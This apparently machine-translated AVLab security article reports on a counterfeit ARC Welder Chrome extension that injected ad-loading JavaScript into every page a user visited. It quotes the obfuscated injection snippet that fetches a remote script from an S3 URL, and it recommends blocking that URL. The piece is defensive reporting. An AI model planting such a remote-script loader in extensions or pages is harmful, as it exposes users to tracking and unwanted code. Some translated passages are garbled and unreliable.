Thousands of programmers could be fooled by the malware development tool ARC Welder

ARC Welder is a plugin for the Google Chrome browser, which once installed gives you the ability to run any application from the APK file. This real extension of "ARC Welder" is under this link and has almost a million downloads. The most interesting is that it is not available on Google. The value of the meta-tag means that the keywords are not indexed. However, it is indexed for dubious quality and the ARC-Welder.com extension downloaded over 30,000 times, which contains embedded malicious code.

ARC Welder real and false

At Reddit, it was noticed that ARC-Welder.com injected into each web page that was viewed in the background.js file, a JavaScript code that is downloaded from Amazon servers:

(function () {var script = document.createElement ("script"); script.src = "/// s3.amazonaws.com/js-cache/1bbe2f4535e7dfb295.js";document.head.appendChild(script);document .head.removeChild (script)}) (); 

A user who has installed this extension can expect tens or hundreds of references to strange domains displaying ads and containing tracking code. The full decrypted background.js file code is available here . At the very end of this file, we can also see this information:

(...) development is supported by optional b> advertisements that are added to some of the websites you visit. During support of this extension, I am sorry, I will not be able to help you.

Ads support most of the internet all use and love; without them, the internet we have today would simply not exist. Similarly, without revenue, this extension (and the upcoming new ones) would not be possible.

You can disable it now. You can also minimize the ads on the button. Both of these options are available by clicking \ 'x \' button in the corner of each ad. B> In both cases, your choice will remain in effect (...)

The same message was used 2 years ago in a similar campaign displaying advertisements in another extension, and it is possible that the same author is responsible for both browser add-ons.

Fighting with ads is not difficult. All top browsers support the brilliant extension of uBlock Origin, which we recommend for installation to users regardless of the work performed on the computer. If you are a developer and you use ARC Welder, you should add this script to blocked filters: s3.amazonaws.com/js-cache/1bbe2f4535e7dfb295.js



Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.